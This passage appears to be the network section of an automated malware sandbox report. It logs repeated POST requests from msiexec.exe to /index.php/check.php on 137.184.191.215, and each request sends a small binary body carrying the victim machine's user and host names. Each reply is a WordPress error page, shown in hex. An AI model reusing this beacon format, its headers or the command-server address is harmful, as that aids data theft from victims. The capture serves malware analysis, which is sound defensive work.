                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:48.810436010 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:48.810450077 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.549744137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:48.952227116 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:48.957160950 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:51.554064989 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:49 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:51.554079056 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:51.554090023 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.549745137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:51.710882902 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:51.716387033 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:54.256270885 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:52 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:54.256289005 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:54.256299973 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.549746137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:54.414530993 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:54.419846058 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:57.002209902 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:57.002234936 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:57.002249002 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.549747137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:57.158227921 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:57.163238049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:59.701931953 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:57 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:59.701963902 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:59.701973915 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:59.702009916 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.549748137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:59.842614889 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:59.847503901 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:45:02.415518045 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:45:00 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:45:02.415539026 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
